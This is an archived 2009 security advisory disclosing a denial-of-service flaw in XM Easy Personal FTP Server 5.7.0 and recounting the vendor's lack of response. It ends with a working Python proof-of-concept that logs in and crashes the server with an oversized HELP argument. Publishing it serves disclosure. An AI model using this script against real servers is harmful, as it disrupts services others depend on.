Date: Fri, 5 Jun 2009 03:16:50 -0600
From: [email protected]
To: [email protected]Subject: [Security] XM Easy Personal FTP Server Multiple DoS vulnerabilities
X-Virus-Scanned: antivirus-gw at tyumen.ru
XM Easy Personal FTP Server Multiple DoS vulnerabilities
Credits:
NeerajT of Nevis Labs
http://www.nevisnetworks.com/services.php?id=10
Date of Discovery: 14-May-2009
Vendor: Dxmsoft
URL: http://www.dxm2008.com/
Affected:
XM Easy Personal FTP Server 5.7.0
Earlier versions may also be affected
Overview:
XM Easy Personal FTP Server is a easy use FTP server Application. Multiple Denial of service vulnerability exists in XM Personal FTP Server that causes the application to crash when a long list of arguments is sent to certain FTP commands post authentication.
Details:
The DoS vulnerability exists because the application fails to handle large parameter values sent to certain FTP commands like HELP or TYPE. When a long value ( > 4700 Bytes) is passed as a parameter to these commands, the FTP server cannot process it and it will crash. Note that this is a post authentication vulnerability, so user must be logged in to exploit the vulnerability. No registers are overwritten, hence remote code execution may not be possible.
Severity:
High
Solution:
No patches available from vendor
No workaround is available at this time
Vendor Communication Timelines:
05.14.2009 - Vulnerability Discovered
05.15.2009 - Vendor Notified
05.20.2009 - No Response, Vendor Notified again
06.05.2009 - No Ack from Vendor, Public Disclosure
PoC: Python Exploit
-----------------------------------------------------
#!/usr/bin/python
#
# ::::::::::::::::::::::::::::::[neeraj(.)thakar(at)nevisnetworks(.)com]
#
# [-] What:....[ XM Easy Personal FTP Server 5.7.0 ].....
# [-] Where:...[ http://www.dxm2008.com ]................
# [-] When:....[ 14-May-2009 ]...........................
# [-] Who:.....[ NeerajT | neeraj(.)thakar(at)nevisnetworks(.)com ]....
# [-] How:.....[
# A Denial of service vulnerability exists in XM
# Personal FTP Server that causes the application to
# crash when a long list of arguments is sent to
# certain FTP commands post authentication..........]
# [-] Thankz:..[ Jambalaya, Xin and Chintan ]............
import os
import sys
import time
from ftplib import FTP
def usage():
print "[...XM Personal FTP Server 5.7.0 DoS Exploit...]"
print "[.........neeraj(.)thakar(at)gmail(.)com..............]\n"
print "Usage: ./XMPersonal_FTPServer_DoSPoC.py <server-ip> <username> <password>\n"
print "\n Use it at your own risk ! This is just a PoC. I am not responsible for damages done by your crazy thinking.. :P\n"
# The Main function starts here..
if __name__ == "__main__":
ftpport = '21'
# get the args..
if len(sys.argv) < 3:
usage()
sys.exit(1)
ftpserver = sys.argv[1]
user = sys.argv[2]
passwd = sys.argv[3]
print "Connecting to "+ftpserver+" using "+user+"....",
# Try opening a connection to the FTP server
try:
F = FTP(ftpserver)
F.timeout = 3
if F:
print 'Connected !'
except:
print "\nCould not connect to the Server :(\n"
sys.exit(1)
#Lets create the Buffer..
crap = "A" * 5000
# Creat'in da'bomb
dabomb = 'HELP '+crap
print "Press any key to login.."
ch = sys.stdin.read(1)
# Lets login
try:
F.login(user, passwd)
except:
print "Oops.. Looks like you forgot to create a login !!\n"
F.quit()
sys.exit(1)
print "Target Locked, Press any key to fire..",
ch = sys.stdin.read(1)
print 'Sendin Da\'Bomb..'
try:
F.sendcmd(dabomb)
except:
print 'Target destroyed !! Mission successfull..!'
print 'Returning to base..'
F.close()
sys.exit(0)
-----------------------------------------------------